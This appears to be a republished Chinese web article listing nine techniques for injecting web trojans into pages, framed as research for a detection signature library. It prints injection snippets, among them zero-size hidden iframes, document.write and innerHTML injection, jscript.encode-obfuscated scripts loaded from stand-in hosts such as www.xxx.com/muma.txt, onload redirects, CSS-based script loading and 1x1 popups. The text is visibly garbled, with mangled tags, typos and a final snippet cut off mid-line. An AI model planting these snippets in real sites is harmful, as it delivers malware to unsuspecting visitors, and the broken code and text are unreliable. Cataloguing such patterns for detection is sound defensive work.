短网址网页木马常见9种挂马技术

时间：2023-05-16 08:00:02 | 来源：网站运营

时间：2023-05-16 08:00:02 来源：网站运营

短网址网页木马常见9种挂马技术：短网址网页源码的ＤＯＭ解析技术，在处理完爬取下来的短网址网页源码后，接下来要进行的是短网址源码与短网址页面木马特征值的匹配。要完成匹配的工作，就需要建立短网址网页木马特征值的正则表达式库，然后实现短网址网页源码与正则表达式的匹配。

短网址网页木马解析之常见挂马方式

由于该技术是公司项目，主要为互联网提供安全保护服务，因此在项目成立初就针对这些网站进行了详细的调研，对此类站点遇到的挂马方式进行了详细的总结和整理，再结合目前互联网上的主流挂马方式，建立起短网址的木马特征库。根据前期调研总结了此类站点最常的挂马方式．具体如下：

短网址木马解析1、框架挂马：

＜ｉｆｉａｉｎｅ ｓｒｃ ＝＂网页木马地址＂ｗｉｄｔｈ ＝ “0” ｈｅｉｇｈｔ ＝ “0”＞＜／ｉｆｒａｍｅ＞

ｉｆｒａｍｅ是普通的ＨＴＭＬ标签，主要用来在一个网页界面中，划分出左右或者上下的框架，侵入者利用ｉｆｏｍｅ的功能，在正常网页中，写入长宽为0的隐藏框架，让用户在不知不觉中就打开了木马网站。

短网址木马解析2、ＪＳ文件挂马：

ＪＳ文件挂马方法是，将指向木马的代码写入文件，保存为ｘｘｘ．ｊｓ，然后通过写入＜script ｌａｎｇｕａｇｅ＝ ＂ｊａｖａｓｃｒｉｐｔ＂ ｓｒｃ ＝ ＂ｘｘｘ．Ｊｓ”＞＜／ｓｃｒｉｐｔ＞来实现桂马。指向木马的代码如下：

ｄｏｃｕｍeｔ.ｗｒｉｔｅ（＂＜ｉｆrａｍｅ ｗｉｄｔｈ ＝”0” ｈｅｉｇｈｔ ＝ ＂０＂ ｓｒｃ=’网页木马地址’>”)。

短网址木马解析3、ＪＳ变形加密：

利用ｊｓｃｒｉｐｔ．ｅｎｃｏｄｅ加密，会使代码更具隐蔽性，这里的挂马网址的文件后缀是ｍｕｍａ.txt，除此之外，还可以引入其他扩展名的JS代码。

＜ｓｃｒｉｐｔ ｌａｎｇｕａｇｅ =＂ｊｓｃｒｉｐｔ．Ｅｎｃｏｄｅ” ｓｒｃ ＝

＂ｈｔｔｐ：／／ｗｗｗ．ｘｘｘ．ｃｏｍ／ｍｕｍａ．tｘｔ”＞＜／ｓｃｒｉｐｔ＞

短网址木马解析4、ｂｏｄｙ挂马：

使用如下代码，就可政使网页在加载完成的时候跳转到网页木马的网址

＜ｂｏｄｙ ｏｎｌｏａｄ =＂ｗｉｎｄｏｗ．ｌｏｃａｔｉｏｎ ＝’网页木马地址’;”><／ｂｏｄｙ〉。

短网址木马解析5、ｃｓｓ挂马：

在文挡的样式表中使用ＵＲＬ函数引入木马链接，具体格式如下：

ｂｏｄｙ ｛ ｂａｃｋｇｒｏｕｎｄ－ｉｍａｇｅ ： ｕｒｌ （‘ｊａｖａｓｃｒｉｐｔ：

ｄｏｃｕｍｅｎｔ．ｗｒｉｔｅ （＂＜ｓｃｒｉｐｔ ｓｒｃ

＝’ｈｔｔｐ：／／ｗｗｗ．ｘｘ．Ｎｅｔ/mｕｍａ．Ｊｓ’〉＜／ｓｃｒｉｐｔ＞”）’）}。

短网址木马解析6、图片挂码：

这种挂马方式利用图片作为伪装，用户点击图片，一个看不见的窗口被激活运行，木马也随之被运行。挂马代码如下：

＜ｈｔｍｌ＞

＜ｉｆｒａｍｅ ｓｒｃ ＝’网页木马地址’ｈｅｉｇｈｔ ＝ ０ ｗｉｄｔｈ

＝ ０ ＞＜／ｉｆｒａｍｅ＞

＜Ｌｍｇ ｓｒｃ =‘图片地址’＞＜／ｃｅｎｔｅｒ＞

＜／ｈｔｍｌ＞

短网址木马解析7、利用隐藏的分割框架引入网页木马：示例代码如下：

＜ｆrａｍｅｓｅｔ ｒｏｗ = ‘‘４４４，０”ｃｏｌｓ ＝ ＂＊”＞

＜ｆｒａｍｅ ｓｒｃ ＝”打开网页”ｆｒａｍｂｏｒｄｅｒ ＝ ＂ｎｏ＂ ｓｃｒｏｌｌｉｎｇ

=”auto＂ｎｏresｉｚｅ ｍａｒｇｉｎｗｉｄth＝‘”０”ｍａｒｇｉｎｈｅｉｇｈｔ＝＂０”＞

＜fiａmｅ ｓｒｃ=＂网巧木马地址＂ｆｒａｍｂｏｒｄｅｒ ＝ ＂ｎｏ＂ ｓｃｒｏｌｌｉｎｇ

＝ ＂ａｕｔｏ＂ ｎｏｒｅｓｉｚｅ ｍａrginwｉｄｔｈ＝”0”ｍａrｇｉｎｈｅｉｇｈｔ ＝ ＂０’’＞

＜／ｆｒａｍｅｓｅｔ＞

短网址木马解析8、Ｊａｖａ 挂马：

＜ｓｃｒｉｐｔ ｌａｎｇｕａｇｅ=”ｊａｖａｓｃｒｉｐｔ”＞

ｗｉｎｄｏｗ．Ｏｐｅｎ(“ 网页木马地址＂,””,”ｔｏｏｌｂａｒ = ｎｏ， ｌｏｃａｔｉｏｎ＝ｎｏ，

ｄｉｒｅｃｔｏｒｉｅｓ＝ ｎｏ， ｓｔａｔｕｓ＝ｎｏ， ｍｅｎｕｂａｒ ＝ ｎｏ，

ｓｃｒｏｌlbarｓ=ｎｏ， ｗｉｄｔｈ＝ １， ｈｅｉｇｈｔ ＝ １”）；

短网址木马解析9、隐蔽挂马：

ｔｏｐ．ｄｏｃｕｍｅｎｔｂｏｄｙ．ｉｎｎｅｒＨＴＭＬ ＝ ｔｏｐ．ｄｏｃｕｍｅｎｔｂｏｄｙ．

ｉnnｅｒＨＴＭＬ ＋ ＇＼ｒ＼ｎ＜ｉｆｒａｍｅ ｓｒｃ ＝”;

原文来自：短网址 http:980.so